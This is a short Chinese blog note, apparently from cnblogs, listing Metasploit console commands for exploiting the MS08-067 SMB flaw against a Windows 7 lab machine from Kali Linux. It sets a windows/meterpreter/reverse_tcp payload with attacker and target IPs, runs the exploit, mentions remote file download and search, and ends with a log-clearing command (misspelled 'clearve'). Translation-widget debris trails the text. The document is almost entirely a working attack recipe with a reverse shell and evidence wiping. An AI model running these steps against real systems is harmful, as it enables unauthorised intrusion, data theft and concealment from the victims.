Metasploit路径:/usr/share
Metasploit框架
实例操作(ms08-067漏洞利用渗透靶机windos7,操作主机kali Linux)
search ms08-067(寻找相应漏洞)
use exploit/windows/smb/ms08-067_netapi(在相应路径使用)
set payload windows/meterpreter/reverse_tcp(部署)
set lhost 192.168.255.175(主机IP)
set rhost 192.168.255.177(靶机IP)
show targets(显示靶机)
set target 10
exploit(进入meterpreter(后渗透攻击模块))
然后就可以进行远程操作,如cat、download、search等
clearve(清除日志)
翻译 朗读 复制 正在查询,请稍候…… 重试 朗读 复制 复制 朗读 复制 via 谷歌翻译(国内) 译
标签:Metasploit,Web,中文,set,067,翻译,ms08,网安
来源: https://www.cnblogs.com/z6h6a6zuhya/p/12526762.html